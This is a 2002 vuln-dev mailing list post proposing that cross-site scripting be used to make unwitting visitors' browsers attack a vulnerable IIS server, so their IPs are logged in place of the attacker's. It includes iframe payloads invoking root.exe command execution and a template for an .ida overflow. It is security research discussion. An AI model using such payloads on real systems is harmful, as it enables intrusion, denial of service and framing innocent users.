Vulnerability Development mailing list archives
New thoughts on CSS
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sat, 2 Feb 2002 11:24:51 +1300
People are talking about CSS, yes still after many years it is a security problem. Some people say 'what sort of a problem, yes you can steal cookies but what else?, So how about new ideas. How about using CSS to exploit vulnerabilities in web sites, with some degree of anonyminity. Example: hello.asp takes 1 paramater (name) that is displayed to the screen with no cleansing. /hello.asp?name = <iframe src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe> I used iframe in the example as it shows something visible on the screen. But an attacker would need no response from the server so image tags etc are all viable. Example Scenario. ----------------- Web board has CSS and also runs vuln iis. Attacker posts message with css exploit that kills the server. User comes along reads message and users ip gets logged as killing the server. This could even be set to kill a different iis server. ------------------ Feedback is requested of course, and perhaps somebody will have time and energy to test further. How about other exploits? Custom made .ida overflow code <iframe src=http://vuln.iis.server/a.ida?XXX....XXX{CUSTOM IDA OVERFLOW CODE}></iframe> Brett
-----Original Message----- From: E M [mailto:rdnktrk () hotmail com] Sent: Saturday, 2 February 2002 08:14 To: billp () boarder org; vuln-dev () securityfocus com Subject: Re: CSS, CSS & let me give you some more CSS I think we are getting away from the original topic, CSS and how it effects you. Basically the general agreement is that cookie stealing via embedded code is the most dangerous use for CSS and the most common.
Current thread:
- RE: CSS, CSS & let me give you some more CSS Obscure (Jan 31)
- <Possible follow-ups>
- RE: CSS, CSS & let me give you some more CSS info (Feb 01)
- Re: CSS, CSS & let me give you some more CSS Bill Pennington (Feb 01)
- Re: CSS, CSS & let me give you some more CSS E M (Feb 01)
- Re: CSS, CSS & let me give you some more CSS Sverre H. Huseby (Feb 01)
- New thoughts on CSS Brett Moore (Feb 01)
- RE: New thoughts on CSS Matt Dickinson (Feb 01)
- RE: New thoughts on CSS jon schatz (Feb 01)
- Re: New thoughts on CSS Blue Boar (Feb 01)
- Re: New thoughts on CSS Jonas M Luster (Feb 03)
- RE: New thoughts on CSS other (Feb 02)
- Re: CSS, CSS & let me give you some more CSS Blake Frantz (Feb 01)
- Re: CSS, CSS & let me give you some more CSS Andre Mariƫn (Feb 04)
- RE: CSS, CSS & let me give you some more CSS Brian McWilliams (Feb 01)
- RE: CSS, CSS & let me give you some more CSS Marc Slemko (Feb 01)
- RE: CSS, CSS & let me give you some more CSS - phinegeek - (Feb 02)